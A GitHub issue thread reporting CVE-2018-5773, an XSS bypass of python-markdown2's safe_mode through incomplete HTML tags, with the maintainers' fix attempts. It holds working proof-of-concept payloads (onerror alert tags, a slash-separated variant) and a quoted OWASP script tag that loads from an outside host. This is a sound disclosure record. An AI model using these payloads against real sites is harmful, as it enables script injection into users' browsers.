Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Possible XSS in safe_mode using incomplete tags #285

Closed
vin01 opened this issue Jan 18, 2018 · 6 comments · Fixed by #303
Closed

Possible XSS in safe_mode using incomplete tags #285

vin01 opened this issue Jan 18, 2018 · 6 comments · Fixed by #303

Comments

@vin01
Copy link
Contributor

vin01 commented Jan 18, 2018
edited

PoC with latest version:

>>> from markdown2 import markdown as mark
>>> mark('<img src="" onerror=alert(/XSS/)>', safe_mode=True)
u'<p>[HTML_REMOVED]</p>\n'
>>> mark('<img src="" onerror=alert(/XSS/) ', safe_mode=True) # Please notice the space at end of string.
u'<p><img src="" onerror=alert(/XSS/) </p>\n'

using safe_mode="escape":

>>> mark('<img src="" onerror=alert(/XSS/)>', safe_mode="escape")
u'<p>&lt;img src="" onerror=alert(/XSS/)&gt;</p>\n'
>>> mark('<img src="" onerror=alert(/XSS/) ', safe_mode="escape")
u'<p><img src="" onerror=alert(/XSS/) </p>\n'

It will trigger an alert box in Chrome. I think it will be a better approach to encode the incomplete tags as well to prevent it.

https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
@thmo
Copy link

thmo commented Jan 29, 2018

This is CVE-2018-5773, is there a fix?

@nicholasserra
Copy link
Collaborator

Not yet. PRs welcome!

@OmgImAlexis OmgImAlexis mentioned this issue Jun 13, 2018
Closed
@miigotu
Copy link

miigotu commented Sep 13, 2018

Any progress on this CVE, or is there an alternative that is safe(r) to use in the meantime?

thombashi added a commit to thombashi/python-markdown2 that referenced this issue Sep 22, 2018
@thombashi
Fix CVE-2018-5773: trentm#285
3cd4a06 
Add sanitization for incomplete HTML tags.
thombashi added a commit to thombashi/python-markdown2 that referenced this issue Sep 22, 2018
@thombashi
Fix CVE-2018-5773: trentm#285
9fc2a37 
Add sanitization for incomplete HTML tags.
@thombashi thombashi mentioned this issue Sep 22, 2018
Merged
nicholasserra added a commit that referenced this issue Sep 26, 2018
@nicholasserra
Merge pull request #303 from thombashi/fix_cve-2018-5773
1b1dcdd 
Fix CVE-2018-5773: #285
@mattnworb mattnworb mentioned this issue Oct 2, 2018
Closed
@vin01
Copy link
Contributor Author

vin01 commented Oct 7, 2018

@nicholasserra @thombashi Thanks for making an attempt to fix it. Unfortunately, XSS is still possible. A modified payload:

>>> from markdown2 import markdown as mark
>>> mark('<img/src="" onerror=alert(/XSS/) ', safe_mode=True)
u'<p><img/src="" onerror=alert(/XSS/) </p>\n'

From: https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

Yair Amit brought this to my attention that there is slightly different behavior between the IE and Gecko rendering engines that allows just a slash between the tag and the parameter with no spaces. This could be useful if the system does not allow spaces.

<SCRIPT/SRC="http://xss.rocks/xss.js"></SCRIPT>

I was able to do something similar with python-markdown as well and it looks like the community agrees on deprecating safe_mode and using tools like Bleach (https://bleach.readthedocs.io/en/latest/).

https://python-markdown.github.io/change_log/release-2.6/#safe_mode-deprecated

@nicholasserra nicholasserra reopened this Oct 8, 2018
@oleast oleast mentioned this issue Oct 25, 2018
Closed
5 tasks
@lsh-0
Copy link

lsh-0 commented Oct 25, 2018

just an FYI, Github is now sending out reports.

screenshot at 2018-10-26 10-07-34

@nicholasserra nicholasserra mentioned this issue Nov 19, 2018
Merged
@nicholasserra
Copy link
Collaborator

@vin01 I just pushed up another PR to try and fix these edge cases. Can you give #315 a run and see if you can find any more issues? Thanks!

@oliverchang oliverchang mentioned this issue May 19, 2022
Closed
@vin01 vin01 mentioned this issue Aug 30, 2022
Merged
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging a pull request may close this issue.

Fix CVE-2018-5773: #285 thombashi/python-markdown2
5 participants
@miigotu @thmo @nicholasserra @lsh-0 @vin01